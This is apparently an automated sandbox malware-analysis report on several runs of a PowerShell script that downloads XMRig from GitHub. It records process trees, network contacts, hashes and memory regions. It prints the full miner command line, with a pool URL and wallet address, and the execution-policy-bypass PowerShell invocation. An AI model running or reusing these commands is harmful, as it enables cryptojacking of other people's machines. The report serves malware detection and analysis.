Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3580-0-0x00007FFED5A23000-0x00007FFED5A25000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hm4v4kd1.fvl.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3580-9-0x0000025FDD130000-0x0000025FDD152000-memory.dmp

memory/3580-10-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp

memory/3580-11-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp

memory/3580-12-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp

memory/3580-14-0x0000025FF5C10000-0x0000025FF5C22000-memory.dmp

memory/3580-15-0x0000025FF5990000-0x0000025FF599A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4736-46-0x000001F686B10000-0x000001F686B30000-memory.dmp

memory/4736-47-0x000001F686B60000-0x000001F686B80000-memory.dmp

memory/3580-49-0x00007FFED5A23000-0x00007FFED5A25000-memory.dmp

memory/4736-48-0x00007FF62D150000-0x00007FF62DD83000-memory.dmp

memory/3580-50-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp

memory/3580-51-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp

memory/4736-52-0x00007FF62D150000-0x00007FF62DD83000-memory.dmp

memory/3580-53-0x00007FFED5A20000-0x00007FFED64E2000-memory.dmp

memory/4736-54-0x000001F686B80000-0x000001F686BA0000-memory.dmp

memory/4736-55-0x000001F686BA0000-0x000001F686BC0000-memory.dmp

memory/4736-56-0x00007FF62D150000-0x00007FF62DD83000-memory.dmp

memory/4736-57-0x00007FF62D150000-0x00007FF62DD83000-memory.dmp

memory/4736-59-0x000001F686BA0000-0x000001F686BC0000-memory.dmp

memory/4736-58-0x000001F686B80000-0x000001F686BA0000-memory.dmp

memory/4736-60-0x00007FF62D150000-0x00007FF62DD83000-memory.dmp

memory/4736-61-0x00007FF62D150000-0x00007FF62DD83000-memory.dmp

memory/4736-62-0x00007FF62D150000-0x00007FF62DD83000-memory.dmp

memory/4736-63-0x00007FF62D150000-0x00007FF62DD83000-memory.dmp

memory/4736-64-0x00007FF62D150000-0x00007FF62DD83000-memory.dmp

memory/4736-65-0x00007FF62D150000-0x00007FF62DD83000-memory.dmp

memory/4736-66-0x00007FF62D150000-0x00007FF62DD83000-memory.dmp

memory/4736-67-0x00007FF62D150000-0x00007FF62DD83000-memory.dmp

memory/4736-68-0x00007FF62D150000-0x00007FF62DD83000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10v2004-20240508-en

Max time kernel

141s

Max time network

145s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/4632-0-0x00007FF800FD3000-0x00007FF800FD5000-memory.dmp

memory/4632-1-0x000001AD58FF0000-0x000001AD59012000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4kg3ru1f.1ny.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4632-11-0x00007FF800FD0000-0x00007FF801A91000-memory.dmp

memory/4632-12-0x00007FF800FD0000-0x00007FF801A91000-memory.dmp

memory/4632-14-0x00007FF800FD0000-0x00007FF801A91000-memory.dmp

memory/4632-16-0x000001AD59030000-0x000001AD5903A000-memory.dmp

memory/4632-15-0x000001AD71A80000-0x000001AD71A92000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1288-47-0x00000152DAF80000-0x00000152DAFA0000-memory.dmp

memory/1288-48-0x00000152DAFC0000-0x00000152DAFE0000-memory.dmp

memory/1288-49-0x00007FF7BD420000-0x00007FF7BE053000-memory.dmp

memory/1288-50-0x00007FF7BD420000-0x00007FF7BE053000-memory.dmp

memory/4632-51-0x00007FF800FD3000-0x00007FF800FD5000-memory.dmp

memory/4632-52-0x00007FF800FD0000-0x00007FF801A91000-memory.dmp

memory/1288-53-0x00000152DAFE0000-0x00000152DB000000-memory.dmp

memory/1288-54-0x00000152DC8C0000-0x00000152DC8E0000-memory.dmp

memory/1288-55-0x00007FF7BD420000-0x00007FF7BE053000-memory.dmp

memory/1288-56-0x00007FF7BD420000-0x00007FF7BE053000-memory.dmp

memory/1288-57-0x00000152DAFE0000-0x00000152DB000000-memory.dmp

memory/1288-58-0x00000152DC8C0000-0x00000152DC8E0000-memory.dmp

memory/1288-59-0x00007FF7BD420000-0x00007FF7BE053000-memory.dmp

memory/1288-60-0x00007FF7BD420000-0x00007FF7BE053000-memory.dmp

memory/1288-61-0x00007FF7BD420000-0x00007FF7BE053000-memory.dmp

memory/1288-62-0x00007FF7BD420000-0x00007FF7BE053000-memory.dmp

memory/1288-63-0x00007FF7BD420000-0x00007FF7BE053000-memory.dmp

memory/1288-64-0x00007FF7BD420000-0x00007FF7BE053000-memory.dmp

memory/1288-65-0x00007FF7BD420000-0x00007FF7BE053000-memory.dmp

memory/1288-66-0x00007FF7BD420000-0x00007FF7BE053000-memory.dmp

memory/1288-67-0x00007FF7BD420000-0x00007FF7BE053000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win11-20240508-en

Max time kernel

146s

Max time network

156s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1216-0-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qj5j5mlr.sys.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1216-9-0x0000018BED060000-0x0000018BED082000-memory.dmp

memory/1216-10-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/1216-11-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/1216-12-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/1216-14-0x0000018BED6B0000-0x0000018BED6C2000-memory.dmp

memory/1216-15-0x0000018BED090000-0x0000018BED09A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2888-46-0x000001B9BA5A0000-0x000001B9BA5C0000-memory.dmp

memory/2888-47-0x000001B9BBEE0000-0x000001B9BBF00000-memory.dmp

memory/1216-49-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp

memory/2888-48-0x00007FF7449C0000-0x00007FF7455F3000-memory.dmp

memory/1216-50-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp

memory/2888-51-0x00007FF7449C0000-0x00007FF7455F3000-memory.dmp

memory/2888-53-0x000001B9BBF20000-0x000001B9BBF40000-memory.dmp

memory/2888-52-0x000001B9BBF00000-0x000001B9BBF20000-memory.dmp

memory/2888-54-0x00007FF7449C0000-0x00007FF7455F3000-memory.dmp

memory/2888-55-0x00007FF7449C0000-0x00007FF7455F3000-memory.dmp

memory/2888-57-0x000001B9BBF20000-0x000001B9BBF40000-memory.dmp

memory/2888-56-0x000001B9BBF00000-0x000001B9BBF20000-memory.dmp

memory/2888-58-0x00007FF7449C0000-0x00007FF7455F3000-memory.dmp

memory/2888-59-0x00007FF7449C0000-0x00007FF7455F3000-memory.dmp

memory/2888-60-0x00007FF7449C0000-0x00007FF7455F3000-memory.dmp

memory/2888-61-0x00007FF7449C0000-0x00007FF7455F3000-memory.dmp

memory/2888-62-0x00007FF7449C0000-0x00007FF7455F3000-memory.dmp

memory/2888-63-0x00007FF7449C0000-0x00007FF7455F3000-memory.dmp

memory/2888-64-0x00007FF7449C0000-0x00007FF7455F3000-memory.dmp

memory/2888-65-0x00007FF7449C0000-0x00007FF7455F3000-memory.dmp

memory/2888-66-0x00007FF7449C0000-0x00007FF7455F3000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10v2004-20240426-en

Max time kernel

142s

Max time network

112s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 130.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

memory/4524-0-0x00007FF8FF6F3000-0x00007FF8FF6F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2e30gk4g.yru.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4524-6-0x000001CFFFD40000-0x000001CFFFD62000-memory.dmp

memory/4524-11-0x00007FF8FF6F0000-0x00007FF9001B1000-memory.dmp

memory/4524-12-0x00007FF8FF6F0000-0x00007FF9001B1000-memory.dmp

memory/4524-14-0x00007FF8FF6F0000-0x00007FF9001B1000-memory.dmp

memory/4524-15-0x000001CFE7860000-0x000001CFE7872000-memory.dmp

memory/4524-16-0x000001CFE7850000-0x000001CFE785A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4664-47-0x000001E4B20C0000-0x000001E4B20E0000-memory.dmp

memory/4664-48-0x000001E4B3AC0000-0x000001E4B3AE0000-memory.dmp

memory/4664-49-0x00007FF7BE5F0000-0x00007FF7BF223000-memory.dmp

memory/4524-50-0x00007FF8FF6F3000-0x00007FF8FF6F5000-memory.dmp

memory/4664-52-0x000001E4B3AE0000-0x000001E4B3B00000-memory.dmp

memory/4664-53-0x000001E4B3B00000-0x000001E4B3B20000-memory.dmp

memory/4524-51-0x00007FF8FF6F0000-0x00007FF9001B1000-memory.dmp

memory/4664-54-0x00007FF7BE5F0000-0x00007FF7BF223000-memory.dmp

memory/4524-55-0x00007FF8FF6F0000-0x00007FF9001B1000-memory.dmp

memory/4664-56-0x00007FF7BE5F0000-0x00007FF7BF223000-memory.dmp

memory/4664-58-0x000001E4B3AE0000-0x000001E4B3B00000-memory.dmp

memory/4664-57-0x00007FF7BE5F0000-0x00007FF7BF223000-memory.dmp

memory/4664-59-0x000001E4B3B00000-0x000001E4B3B20000-memory.dmp

memory/4664-60-0x00007FF7BE5F0000-0x00007FF7BF223000-memory.dmp

memory/4664-61-0x00007FF7BE5F0000-0x00007FF7BF223000-memory.dmp

memory/4664-62-0x00007FF7BE5F0000-0x00007FF7BF223000-memory.dmp

memory/4664-63-0x00007FF7BE5F0000-0x00007FF7BF223000-memory.dmp

memory/4664-64-0x00007FF7BE5F0000-0x00007FF7BF223000-memory.dmp

memory/4664-65-0x00007FF7BE5F0000-0x00007FF7BF223000-memory.dmp

memory/4664-66-0x00007FF7BE5F0000-0x00007FF7BF223000-memory.dmp

memory/4664-67-0x00007FF7BE5F0000-0x00007FF7BF223000-memory.dmp

memory/4664-68-0x00007FF7BE5F0000-0x00007FF7BF223000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10v2004-20240226-en

Max time kernel

153s

Max time network

149s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4136 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 138.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
